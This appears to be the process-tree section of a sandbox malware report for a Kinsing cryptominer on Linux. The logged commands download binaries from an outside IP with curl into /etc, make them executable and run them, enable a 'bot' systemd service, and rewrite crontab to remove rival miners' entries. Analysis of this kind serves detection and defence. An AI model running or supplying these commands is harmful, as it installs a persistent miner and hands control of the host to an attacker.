                                                                                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1870
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                      chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1879
                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                        curl -o /etc/kinsing http://80.71.158.12/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                          chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2375
                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                            chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                              curl -o /etc/kinsing http://80.71.158.12/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2381
                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2383
                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                  chmod 777 /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                    curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2393
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                      chmod +x /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2404
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                        chmod 777 /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2409
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                          curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2410
                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                            chmod +x /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2433
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                              rm -rf /tmp/kdevtmpfsi
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2438
                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2439
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                  chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2440
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                    /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2441
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/id
                                                                                                                                                                                                                                                                                                                                                                                                                                      id -u
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2442
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                        systemctl enable bot
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads EFI boot settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2443
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                        systemctl start bot
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads EFI boot settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2469
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2473
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2471
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                          sed /base64/d
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2472
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2487
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /_cron/d
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2486
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2485
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2490
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /31.210.20.181/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2489
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2488
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2497
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /update.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2496
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2495
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2500
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /logo4/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2499
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2498
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2503
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /logo9/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2502
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2501
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2506
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /logo0/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /logo/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2509
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /tor2web/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2511
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2510
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /jpg/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2514
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /png/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /tmp/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /zmreplchkr/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2522
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /aliyun.one/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /3.215.110.66.one/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2529
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2533
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /pastebin/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /onion/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2535
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2534
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2539
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /lsd.systemten.org/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2538
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /shuf/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2541
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /ash/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2543
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /mr.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2547
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /185.181.10.234/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2549
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2554
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /localhost.xyz/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2553
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2557
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /45.137.151.106/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2555
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2560
